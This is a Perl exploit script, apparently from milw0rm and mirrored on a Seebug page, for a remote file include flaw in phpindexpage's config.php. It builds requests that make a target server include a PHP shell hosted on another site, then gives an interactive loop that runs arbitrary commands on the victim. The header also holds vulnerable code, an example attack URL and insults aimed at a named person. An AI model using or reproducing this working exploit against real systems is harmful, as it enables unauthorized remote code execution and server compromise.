#!/usr/bin/perl ########################################################################################################## # # # phpindexpage 1.0 & 1.0.1 (config.php)Remote File Include Vulnerability # # # # Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Pantagon # # # # Class: Remote File Include Vulnerability # # # # exemplary Exp: http://www.site.com/config.php?env[inc_path]= # # # # Remote: Yes # # # # Type: Highly critical # # # # Vulnerable Code:include("$env[inc_path]/config.dist.php"); # # # # Download:http://heanet.dl.sourceforge.net/sourceforge/phpindexpage/phpindexpage-1.0.1.tgz # # # # Ptach : www.Advistory.deltasecurity.ir # # # # Bug Found : DeltahackingTEAM Exploitet Discovered & Exploitet: Dr.Pantagon<Dr.Pantagon[A]Gmail.com # # # # Exploit: phpindex.pl # # # # Web Site:www.deltasecurity.ir # # # #SP FUCK.............: z_zer0c00l(floozie Mother Test 100%=z_zer0c00l=misbegotten:D) # ########################################################################################################## use LWP::UserAgent; use LWP::Simple; $target = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; $file = "config.php?env[inc_path]="; if(!$target || !$shellsite) { usage(); } header(); print "Type 'exit' to quit"; print "[cmd]\$"; $cmd = <STDIN>; while ($cmd !~ "exit") { $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $r = $res->content; $r =~ tr/[\n]/[ê]/; if (@ARGV[4] eq "-r") { print $r; } elsif (@ARGV[5] eq "-p") { # if not working change cmd variable to null and apply patch manually. $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc"; print q { } } else { print "[cmd]\$"; $cmd = <STDIN>; } } sub header() { print q { ################################################################################# Only Str0ke Bug Found : DeltahackingTEAM phpindex.pl - Remote File Include Exploit Vulnerability discovered and exploitet by Dr.Pantagon Dr.Pantagon@Gmail.com www.DeltaSecurity.ir ################################################################################# }; } sub usage() { header(); print q { ######################################################################## Usage: perl Yrch!.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p> <Target Website> - Path to target eg: www.lashiyane.org <Shell Location> - Path to shell eg: d4wood.by.ru/cmd.gif <CMD Variable> - Shell command variable name eg: Pwd <r> - Show output from shell <p> - config.php Example: perl Axiom.pl http://localhost/include http://localhost/s.txt cmd -r -p ######################################################################## }; exit(); } # Reza Yavari # milw0rm.com [2007-01-20]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论